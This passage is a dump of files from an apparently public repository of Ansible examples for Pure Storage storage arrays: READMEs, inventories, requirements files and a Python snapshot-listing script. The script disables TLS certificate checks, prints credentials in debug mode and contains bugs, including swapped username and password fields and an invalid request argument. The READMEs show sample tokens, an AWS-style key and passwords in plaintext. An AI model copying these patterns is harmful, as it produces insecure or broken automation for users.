"blob_id": "cb82713459524485b56b211e251fc7c2abb8eea2",
"content_id": "bd0d10faed7c7ec1f51f7f2d0d855096c1efcc7c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 69,
"license_type": "permissive",
"max_line_length": 16,
"num_lines": 6,
"path": "/flashblade/pure-fb-smb-filesystem-map/requirements.txt",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "ansible\npurity-fb==1.9.1\nnetaddr\npytz\npywinrm>=0.3.0\npywinrm[credssp]"
},
{
"alpha_fraction": 0.6506205201148987,
"alphanum_fraction": 0.6602106094360352,
"avg_line_length": 37.81752014160156,
"blob_id": "15d00b74aa8ece2714b5fdfa26a0a4b57b51bdf2",
"content_id": "46e23ec90ab8ef1cc8e71626dc39be0b49cb956d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5320,
"license_type": "permissive",
"max_line_length": 379,
"num_lines": 137,
"path": "/flashblade/pure-fb-filesystem-mount/Readme.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "FlashBlade NFS File System mount\n=========\n\nAnsible playbook and role for FlashBlade NFS File System mount on clients.\n\n\nRequirements\n------------\n\n**Requires: Python >=2.7, <=3.6 on Ansible control node.**\n\nAs purity-fb SDK supports Python >=2.7, <=3.6, We need to ensure that Installed Python version on Ansible control Node must be >=2.7 and <=3.6.\n\n* Install python-pip on Ansible control node.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n\n* Install dependencies from \"requirements.txt\"\n ```bash\n $ sudo pip install -r requirements.txt\n ```\n* Install Ansible Collection for Pure Storage FlashBlade\n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n ```\n\nRole Variables\n--------------\n\nThere are two variable files \"fb_details.yml\" and \"fb_secrets.yml\" are holding the Ansible variables for the role at path `vars/<enviorement_name>`. \n\nThis role and playbook can be used to setup File System on FlashBlade servers and mount on clients in different environments. To store role variable files user can create different directories with `vars/<environment_name>`. User must specify `<environment_name>` while running `ansible-playbook` by specifying value in extra vars command line flag `-e \"env=<environment_name>\"`.\n\nAnsible playbooks require API token to connect to FlashBlade servers. API token can be obtained by connecting FlashBlade management VIP through ssh for a specific user and running the following purity command.\n ```\n $ ssh <pureuser>@<pure_fb_mgmt_ip>\n $ pureadmin list <username> --api-token -–expose\n ```\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\".\n\nEncrypt \"fb_secrets.yml\" using Ansible-Vault and enter password when prompted. 
This password is required to run playbook.\n```\n$ ansible-vault encrypt fb_secrets.yml\n```\n\nUpdate variables in `fb_details.yml` and `fb_secrets.yml` files to the desired values.\n\n* fb_details.yml\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.22.222.80 \n filesystem:\n - { name: tools, size: 1T, type: nfsv4.1, nfs_rules: '*(ro,noatime)' } \n - { name: scratch, size: 1T, type: nfsv3, nfs_rules: '*(ro,noatime)' } \n - { name: database, size: 1T, type: nfsv3, nfs_rules: '*(rw,noatime)' }\n\n linux_client_mount:\n mount1:\n server: { fb_name: FBServer1, fileshare: tools, data_vip: data-vip } \n client: { hosts: dc, mount_state: mount, mount_point: /mnt/tools, opts: \"rw,noatime\" }\n mount2:\n server: { fb_name: FBServer1, fileshare: scratch, data_vip: nfs-a04-data1 } \n client: { hosts: dc, mount_state: mount, mount_point: /mnt/scratch, opts: \"rw\" }\n mount3:\n server: { fb_name: FBServer1, fileshare: database, data_vip: nfs-a04-data1 }\n client: { hosts: dc, mount_state: mount, mount_point: /mnt/database, opts: \"rw\" }\n \n ```\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n api_token: T-79ced0e5-xxxx-xxxx-8741-66482f04c6d1\n FBServer2:\n api_token: T-0b8ad89c-xxxx-xxxx-85ed-286607dc2cd2 \n ```\nNote: To unmount FIleSystem, User can change `mount_state: umount` variable in fb_details.yml file.\n\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n - name: FlashBlade filesystem setup\n hosts: localhost\n gather_facts: false\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_filesystem_setup\n\n - name: Mount file share on hosts\n hosts: all\n gather_facts: true\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_nfs_mount\n\nTo execute playbook with host ssh key, issue the following command:\n( Replace `<ssh_user>` with host ssh user name and `<key_file_path>` with host private key file path )\n ```bash\n $ ansible-playbook filesystem_mount.yml -e \"env=<enviorement_name>\" -i hosts.ini --user=<ssh_user> --key-file=<key_file_path> --ask-vault-pass \n ```\n\nTo execute playbook with host password( Not Recommended ), issue the following command:\n( Replace `<enviorement_name>` with the correct value )\n ```bash\n $ ansible-playbook filesystem_mount.yml -e \"env=<enviorement_name>\" -i hosts.ini --ask-vault-pass --ask-pass --ask-become-pass\n ```\nEnter Ansible-Vault password, hosts/clients ssh password and root password.\n\n**Note:** If you are using MacOS as Ansible control node and using password to connect to remote hosts, SSH connection with password not supported.\nThe workaround for this limitation is to pass `-c paramiko` flag in ansible-playbook command. Install paramiko using `pip install paramiko`.\n"
},
{
"alpha_fraction": 0.5404070019721985,
"alphanum_fraction": 0.5491279363632202,
"avg_line_length": 29.26392936706543,
"blob_id": "2a72133bf42a5cc754015d1ea8fb3ace2e38f00c",
"content_id": "2745560b44d17117247f6687cd5040b593df04b1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10320,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 341,
"path": "/oracle-database/files/monitor_PGrep.py",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "import requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nfrom base64 import b64encode\nimport os\nimport sys\nimport json\nimport getpass\nfrom optparse import OptionParser\nfrom datetime import datetime, timedelta\nimport time\nfrom time import gmtime, strftime, strptime\nfrom operator import itemgetter, attrgetter\n\n# Global Variables\nVERSION = '1.0.0'\nHEADER = 'Pure Storage List Protection Group Snapshot Replication (' + VERSION + ')'\nBANNER = ('=' * 132)\nDEBUG_LEVEL = 0\nVERBOSE_FLAG = False\nQUITE_FLAG = False \n\nCOOKIE = ''\n\ndef create_session(flashArray, user, password, api_token):\n global COOKIE\n\n # Set-up HTTP header\n userAgent = 'Jakarta Commons-HttpClient/3.1'\n hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent, 'Cookie' : COOKIE}\n \n #Establish Session, if no token provide need to create an API token first\n \n if user:\n data = {\n 'password': user,\n 'username': password\n }\n params = json.dumps(data)\n path = '/api/1.12/auth/apitoken'\n url = 'https://%s%s'%(flashArray,path)\n \n # Perform action\n response = requests.post(url, params, headers=hdrs, verify=False)\n\n COOKIE = response.cookies\n \n if DEBUG_LEVEL == 2:\n print('Status', response.status_code)\n print('Reason', response.reason)\n print('Text', response.text)\n print('Data', response.json)\n print('HTTP Header:', response.headers)\n print('Cookie', COOKIE)\n print('')\n \n if (response.reason) != 'OK':\n print(BANNER)\n sys.exit('Exiting: invalid username / password combination')\n \n jsonString = response.text\n jsonData = json.loads(jsonString)\n \n api_token = (jsonData['api_token'])\n\n data = {\n 'api_token': api_token\n }\n \n params = json.dumps(data)\n path = '/api/1.12/auth/session'\n url = 'https://%s%s'%(flashArray,path)\n\n # Perform action\n if not QUITE_FLAG:\n print('Attempting to create session')\n\n response = requests.post(url, params, headers=hdrs, verify=False)\n\n COOKIE = response.cookies\n\n if DEBUG_LEVEL == 2:\n print('Status', response.status_code)\n print('Reason', response.reason)\n print('Text', response.text)\n print('Data', response.json)\n print('HTTP Header:', response.headers)\n print('Cookie', COOKIE)\n print('')\n\n if (response.reason) != 'OK':\n print(BANNER)\n sys.exit('Exiting: Unable to establish session')\n\n jsonString = response.text\n jsonData = json.loads(jsonString)\n\n if not QUITE_FLAG and VERBOSE_FLAG:\n print(json.dumps(jsonData, sort_keys=False, indent=4))\n\n name = (jsonData['username'])\n welcome = 'Welcome ' + name\n\n if not QUITE_FLAG:\n print(welcome)\n\n\ndef post_url(flashArray,path,params):\n # Set-up HTTP header\n userAgent = 'Jakarta Commons-HttpClient/3.1'\n hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent}\n url = 'https://%s%s'%(flashArray,path)\n \n # Perform action\n response = requests.post(url, params, headers=hdrs, cookie=COOKIE, verify=False)\n \n if DEBUG_LEVEL != 0:\n print('Response Status:', response.status_code)\n print('Reason:', response.reason)\n print('Text', response.text)\n print('Data', response.json)\n print('HTTP Header:', response.headers)\n print('Cookie', COOKIE)\n print('')\n \n jsonString = response.text\n jsonData = json.loads(jsonString)\n return(jsonData)\n\n\ndef get_url(flashArray,path,params):\n # Set-up HTTP header\n userAgent = 'Jakarta Commons-HttpClient/3.1'\n hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent}\n url = 
'https://%s%s'%(flashArray,path)\n payload = params\n\n # Perform action\n response = requests.get(url, headers=hdrs, cookies=COOKIE, verify=False)\n \n if DEBUG_LEVEL != 0:\n print('Response Status:', response.status_code)\n print('Reason:', response.reason)\n print('Text', response.text)\n print('Data', response.json)\n print('HTTP Header:', response.headers)\n print('Cookie:', COOKIE)\n \n jsonString = response.text\n jsonData = json.loads(jsonString)\n return(jsonData)\n\n\ndef list_pgsnaps(flashArray,pgroup,limit):\n data = ''\n params = json.dumps(data)\n \n if pgroup != '':\n path = '/api/1.12/pgroup?names=%s&snap=true&transfer=true&sort=created-&limit=%s'%(pgroup,limit)\n else:\n path = '/api/1.12/pgroup?snap=true&transfer=true&sort=created-&limit=%s'%(limit)\n\n # Perform action\n jsonData = get_url(flashArray,path,params)\n\n r = str(jsonData)\n\n if (r[3:15]) == 'pure_err_key':\n pure_err_code = jsonData[0]['pure_err_code']\n msg = 'Exiting: ' + pgroup + ' ' + jsonData[0]['msg']\n print(BANNER)\n\n sys.exit(msg)\n\n if VERBOSE_FLAG:\n print(json.dumps(jsonData, sort_keys=False, indent=4))\n\n # Count of returned rows\n res = len(jsonData)\n\n if res == 0:\n print('No Snaps found')\n else:\n x = 0\n \n if not QUITE_FLAG:\n print(BANNER)\n print('{0:40} {1:60} {2:20} {3:10}'.format('Source', 'Snap Name', 'Created', 'Progress'))\n print(BANNER)\n\n while (x<res):\n #\n source = (jsonData[x]['source'])\n name = (jsonData[x]['name'])\n progress = (jsonData[x]['progress'])\n physical = (jsonData[x]['physical_bytes_written'])\n cdate = (jsonData[x]['created'])\n c1 = cdate[0:10]\n c2 = cdate[11:19]\n c3 = c1 + ' ' + c2\n\n c4 = strptime(c3,'%Y-%m-%d %H:%M:%S')\n created = strftime('%d/%m/%Y %H:%M:%S', c4)\n \n if not QUITE_FLAG:\n print('{0:40} {1:60} {2:20} {3:10}'.format(source, name, created, progress))\n \n x = x + 1\n\ndef parsecl():\n usage = 'usage: %prog [options]'\n version = '%prog ' + VERSION\n description = \"This program returns Snapshots for given Protection Group. 
Please contact [email protected] for any assistance.\"\n\n parser = OptionParser(usage=usage, version=version, description=description)\n\n parser.add_option('-d', '--debug',\n type = 'int',\n dest = 'DEBUG_LEVEL',\n default = 0,\n help = 'Debug level, used for HTTP debugging')\n \n parser.add_option('-l', '--limit',\n type = 'int',\n dest = 'limit',\n default = 999,\n help = 'Limit number of responses [default: %default]')\n \n parser.add_option('-p', '--password',\n action = 'store',\n type = 'string',\n dest = 'password',\n help = 'Pure password')\n \n parser.add_option('-q', '--quite',\n action = 'store_true',\n dest = 'QUITE_FLAG',\n default = False,\n help = 'Quite [default: %default]')\n \n parser.add_option('-P', '--pgroup',\n action = 'store',\n type = 'string',\n dest = 'pgroup',\n default = '',\n help = 'Protection Group')\n \n parser.add_option('-s', '--server',\n action = 'store',\n type = 'string',\n dest = 'flashArray',\n help = 'Pure FlashArray')\n \n parser.add_option('-t', '--token',\n action = 'store',\n type = 'string',\n dest = 'api_token',\n help = 'Pure Api Token')\n\n parser.add_option('-u', '--user',\n action = 'store',\n type = 'string',\n dest = 'user',\n help = 'Pure user name')\n\n parser.add_option('-v', '--verbose',\n action = 'store_true',\n dest = 'VERBOSE_FLAG',\n default = False,\n help = 'Verbose [default: %default]')\n\n (options, args) = parser.parse_args()\n\n '''\n print(\"Options:\", options)\n print(\"Args:\", args)\n '''\n\n if options.api_token and options.user:\n parser.error('options --token and --user are mutually exclusive')\n \n return(options)\n\ndef main():\n # Setup variables\n global DEBUG_LEVEL\n global VERBOSE_FLAG\n global QUITE_FLAG\n exit_code = 0\n\n # Check for command line parameters\n options = parsecl()\n password = options.password\n user = options.user\n flashArray = options.flashArray\n limit = options.limit\n pgroup = options.pgroup\n api_token = options.api_token\n DEBUG_LEVEL = options.DEBUG_LEVEL\n VERBOSE_FLAG = options.VERBOSE_FLAG\n QUITE_FLAG = options.QUITE_FLAG\n \n if DEBUG_LEVEL != 0:\n print('Password', password)\n print('User', user)\n print('Flash Array', flashArray)\n print('Protection Group', pgroup)\n print('Limit', limit)\n print('Api Token', api_token)\n print('Debug Level:', DEBUG_LEVEL)\n print('Verbose Flag:', VERBOSE_FLAG)\n print('Quite Flag:', QUITE_FLAG)\n\n if flashArray == None:\n sys.exit('Exiting: You must provide FlashArray details')\n\n if api_token == None and user == None:\n sys.exit('Exiting: You must provide either API Token details or username and password')\n\n if user and password == None:\n sys.exit('Exiting: You must provide password if using username')\n\n if not QUITE_FLAG:\n print(BANNER)\n print(HEADER + ' - ' + flashArray)\n print(strftime('%d/%m/%Y %H:%M:%S %Z', gmtime()))\n print(BANNER)\n\n # Create session\n create_session(flashArray, user, password, api_token)\n\n list_pgsnaps(flashArray,pgroup,limit)\n \n if not QUITE_FLAG:\n print(BANNER)\n print(strftime('%d/%m/%Y %H:%M:%S %Z', gmtime()))\n print(BANNER)\n\n sys.exit(exit_code)\n\nmain()\n"
},
{
"alpha_fraction": 0.7987805008888245,
"alphanum_fraction": 0.8353658318519592,
"avg_line_length": 40,
"blob_id": "0e62d89e735d7ae49fca733ab4b4d6eec2712079",
"content_id": "803f901dae1e319e191d130bb9ea514d4a0176ab",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 164,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 4,
"path": "/flashblade/pure-fb-filesystem-mount/hosts.ini",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "[dc]\nhost1 ansible_host=ansible-host1 ansible_user=centos\nhost2 ansible_host=ansible-host2 ansible_user=centos\nhost3 ansible_host=ansible-host3 ansible_user=centos\n"
},
{
"alpha_fraction": 0.6611570119857788,
"alphanum_fraction": 0.7933884263038635,
"avg_line_length": 39.33333206176758,
"blob_id": "40545e3021e4725687e20f2eddc3486debae0385",
"content_id": "85b5bac937e506ce50556dfba3dbe178cbdaa4c7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 121,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 3,
"path": "/flashblade/pure-fb-filesystem-replication/hosts.ini",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "[dc]\ninit47d-v46 ansible_host=10.xx.xxx.86 ansible_user=centos\ninit47d-v47 ansible_host=10.xx.xxx.87 ansible_user=centos\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.8070175647735596,
"avg_line_length": 7.285714149475098,
"blob_id": "11d43f19a54f555f825e40e2ac1e0e6dbce1da1a",
"content_id": "58fb654c6c39a83bb47c9898ed267a4d6e6dd047",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 57,
"license_type": "permissive",
"max_line_length": 16,
"num_lines": 7,
"path": "/flashblade/pure-fb-objectstore-replication/requirements.txt",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "ansible\npurity-fb==1.9.1\nnetaddr\npytz\nboto\nboto3\nbotocore"
},
{
"alpha_fraction": 0.7027027010917664,
"alphanum_fraction": 0.7837837934494019,
"avg_line_length": 8.5,
"blob_id": "5474ee5df0554223aa0a6025b5cb67706ffc96f8",
"content_id": "d357d1bd06ee1fe45adfd5099b2c0200efec4fbe",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 37,
"license_type": "permissive",
"max_line_length": 16,
"num_lines": 4,
"path": "/flashblade/pure-fb-filesystem-mount/requirements.txt",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "ansible\npurity-fb==1.9.1\nnetaddr\npytz"
},
{
"alpha_fraction": 0.5923076868057251,
"alphanum_fraction": 0.6293269395828247,
"avg_line_length": 39.51948165893555,
"blob_id": "a2266c0b4101fcf0f407bcda3d568db9d4fd4d66",
"content_id": "fe52cdec253278144f6f1635a57bcaa020927241",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6242,
"license_type": "permissive",
"max_line_length": 355,
"num_lines": 154,
"path": "/flashblade/pure-fb-network-setup/README.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "FlashBlade Network setup\n=========\n\nAnsible playbook and role to setup FlashBlade Network.\n\nRequirements\n------------\n**Requires: Python >=2.7, <=3.6 on Ansible control node.**\n\nAs purity-fb SDK supports Python >=2.7, <=3.6, We need to ensure that Installed Python version on Ansible control Node must be >=2.7 and <=3.6.\n\n* Install python-pip on Ansible control node.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n \n* Install dependencies from \"requirements.txt\"\n ```bash\n $ sudo pip install -r requirements.txt \n ```\n* Install Ansible Collection for Pure Storage FlashBlade\n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n ```\n\nRole Variables\n--------------\n\nThere are two variable files \"fb_details.yml\" and \"fb_secrets.yml\" are holding the Ansible variables for the role at path `vars/<enviorement_name>`. \n\nThis role and playbook can be used to setup network on FlashBlade servers in different environments. To store role variable files, User can create different directories with `vars/<environment_name>`. User must specify `<environment_name>` while running `ansible-playbook` by specifying value in extra vars command line flag `-e \"env=<environment_name>\"`.\n\nAnsible playbooks require API token to connect to FlashBlade servers. API token can be obtained by connecting FlashBlade management VIP through ssh for a specific user and running the following purity command.\n ```\n $ ssh <pureuser>@<pure_fb_mgmt_ip>\n $ pureadmin list <username> --api-token -–expose\n ```\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\".\n\nEncrypt \"fb_secrets.yml\" using Ansible-Vault and enter password when prompted. 
This password is required to run playbook.\n```\n$ ansible-vault encrypt fb_secrets.yml\n```\n\nUpdate variables in `fb_details.yml` and `fb_secrets.yml` files to the desired values.\n\n* fb_details.yml\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.xx.126.80\n network:\n dns: \n - { domain: \"purelab.purestorage.com\", nameservers: [10.12.133.15, 10.12.133.16] } \n ntp: \n - { servers: [10.22.93.14, 10.21.86.15] } \n ds: \n - { dstype: nfs, enable: true, uri: \"ldaps://lab.purestorage.com\", base_dn: \"DC=lab,DC=purestorage,DC=com\", bind_user: Administrator, bind_password: password } \n - { dstype: smb, enable: true, uri: \"ldaps://lab.purestorage.com\", base_dn: \"DC=lab,DC=purestorage,DC=com\", bind_user: Administrator, bind_password: password } \n - { dstype: management, enable: true, uri: \"ldaps://lab.purestorage.com\", base_dn: \"DC=lab,DC=purestorage,DC=com\", bind_user: Administrator, bind_password: password } \n subnet: \n - { name: VLAN2250, prefix: \"10.21.250.0/24\", vlan: 2250, gateway: 10.21.250.1, mtu: 1500 }\n - { name: VLAN2210, prefix: \"10.21.210.0/24\", vlan: 2210, gateway: 10.21.210.1 } # default mtu: 1500\n vip: \n - { name: datavip1-2250, address: 10.21.250.7 } # deafault services: data\n - { name: replvip1-2210, address: 10.21.210.22, services: replication } \n ```\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-4264-87f8-315264d9e65a\n ```\n#### Note\n * Default `mtu` value is 1500 in subnet configuration. User can set desired \"mtu\" value in fb_details.yml file.\n * Only one replication interface(VIP) is allowed on FlashBlade server. If user try to create multiple replication VIP through Ansible playbook, There will be an error `Interface creation failed`.\n * To delete any of the network configuration use `state: disabled` in `fb_details.yml` variable file. 
When playbook executed with below variables in `fb_details.yml`, It will delete data VIP `datavip1-2250` and replication VIP `replvip1-2210`.\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.xx.126.80\n network:\n vip: \n - { name: datavip1-2250, state: disabled }\n - { name: replvip1-2210, state: disabled } \n ```\n * To extend the network setup configuration on the fleet of FlashBlade Arrays, add multiple \"FBServer1...N\" blocks under array_inventory in \"fb_details.yml\" file.\n Example configuration to setup DNS on two FlashBlade servers.\n \n **fb_details.yml**\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.xx.126.80\n network:\n dns: \n - { domain: \"purelab.purestorage.com\", nameservers: [10.12.133.15, 10.12.133.16] } \n FBServer2:\n fb_url: 10.xx.126.110\n network:\n dns: \n - { domain: \"purelab1.purestorage.com\", nameservers: [10.12.132.11, 10.12.132.14] } \n ```\n **fb_secrets.yml**\n \n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-4264-87f8-315264d9e65a\n FBServer2:\n api_token: T-d88e4dec-xxxx-4222-87g3-315264d9e77a\n ```\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n - name: FlashBlade Network setup\n hosts: localhost\n gather_facts: false\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_network_setup\n\nTo execute playbook, issue the following command:\n( Replace `<enviorement_name>` with the correct value )\n ```bash\n $ ansible-playbook purefb_network_setup.yml -e \"env=<enviorement_name>\" --ask-vault-pass\n ```\nEnter Ansible-Vault password which used to encrypt \"fb_secrets.yml\" file.\n"
},
{
"alpha_fraction": 0.6239787340164185,
"alphanum_fraction": 0.6407271027565002,
"avg_line_length": 31,
"blob_id": "b2a6058aaa0454ebfe51e822aa317a8938ad4e87",
"content_id": "23d2af4a65b0ea7bda5f6b4d92554c29f0b4d599",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4896,
"license_type": "permissive",
"max_line_length": 323,
"num_lines": 153,
"path": "/flashblade/pure-fb-objectstore-replication/README.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "FlashBlade Object Replication\n=========\n\nAnsible playbook and role for FlashBlade Array to Array and Array to S3 target(AWS) object Replication.\n\nRequirements\n------------\n\n**Requires: Python >=2.7, <=3.6 on Ansible control node.**\n\nAs purity-fb SDK supports Python >=2.7, <=3.6, We need to ensure that Installed Python version on Ansible control Node must be >=2.7 and <=3.6.\n\n* Install python-pip on Ansible control node.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n \n* Install dependencies from \"requirements.txt\"\n ```bash\n $ sudo pip install -r requirements.txt \n ```\n* Install Ansible Collection for Pure Storage FlashBlade and AWS\n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n $ ansible-galaxy collection install community.aws\n ```\n\nRole Variables\n--------------\n\nThere are two variable files \"fb_details.yml\" and \"fb_secrets.yml\" are holding the Ansible variables for the role at path `vars/<enviorement_name>`. \n\nAnsible playbooks require API token to connect to FlashBlade servers. API token can be obtained by connecting FlashBlade management VIP through ssh for a specific user and running the following purity command.\n ```\n $ ssh <pureuser>@<pure_fb_mgmt_ip>\n $ pureadmin list <username> --api-token --expose\n ```\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\" \n\nEncrypt \"fb_secrets.yml\" using Ansible-Vault.\n```\n$ ansible-vault encrypt fb_secrets.yml\n```\n\n##### Case: 1 - Array to Array Object Replication\n\n* fb_details.yml\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.xx.126.80\n FBServer2:\n fb_url: 10.yy.120.100 \n\n # FB-FB object replication\n S3Replication: \n replication1:\n src: { server: FBServer1, account: srcaccount, user: srcuser, bucket: srcbucket }\n dst: { server: FBServer2, account: dstaccount, user: dstuser, bucket: dstbucket }\n ```\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-4264-87f8-315264d9e65a\n FBServer2:\n api_token: T-79ced0e5-1d36-yyyy-8741-66482f04c6d1 \n ```\n##### Case: 2 - Array to S3(AWS) Object Replication\n\n* fb_details.yml\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.16.126.80 \n\n # FB-AWS object replication\n S3Replication: \n replication1:\n src: { server: FBServer1, account: srcaccount, user: srcuser, bucket: srcbucket }\n dst: { server: s3.amazonaws.com, region: us-west-2, credential: aws1, bucket: awsdstbucket }\n ```\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-4264-87f8-315264d9e65a\n\n s3_secrets:\n aws1:\n access_id: AKIA2OFGHJ436YHILJ7T\n access_key: WeQHJYJ+xxx+yyyyy/5T4AdvwS1kBQwPA8QIW6\n ```\n\nNote: \n * To set bucket lifecycle policy, Add `noncurrent_version_expiration_days: 7` parameter with desired value in \"fb_details.yml\" for the buckets created on FlashBlade. 
For the buckets created on AWS along with `noncurrent_version_expiration_days: 7`, user can set `expiration_days: 6` for the current version of the bucket.\n **Example fb_details.yml with lifecycle policies**\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.16.126.80 \n\n # FB-AWS object replication\n S3Replication: \n replication1:\n src: { server: FBServer1, account: srcaccount, user: srcuser, bucket: srcbucket, noncurrent_version_expiration_days: 7 }\n dst: { server: s3.amazonaws.com, region: us-west-2, credential: aws1, bucket: pureawsbucket, expiration_days: 6, noncurrent_version_expiration_days: 7 }\n ```\n\n\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n - name: FlashBlade object-store replication\n hosts: localhost\n gather_facts: false\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_object_replication\n\nTo execute the playbook, issue the following command:\n( Replace `<enviorement_name>` with the correct value )\n ```bash\n $ ansible-playbook object_replication.yml -e \"env=<enviorement_name>\" --ask-vault-pass\n ```\nEnter Ansible-Vault password which used to encrypt \"fb_secrets.yml\" file.\n"
},
{
"alpha_fraction": 0.5565637946128845,
"alphanum_fraction": 0.584634006023407,
"avg_line_length": 34.625,
"blob_id": "32623706e2764bd2d20c31a3863ba3304886cd44",
"content_id": "bfe836375c6663c18cd7b92336de1db43a49e820",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8267,
"license_type": "permissive",
"max_line_length": 404,
"num_lines": 232,
"path": "/flashblade/pure-fb-filesystem-setup/README.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
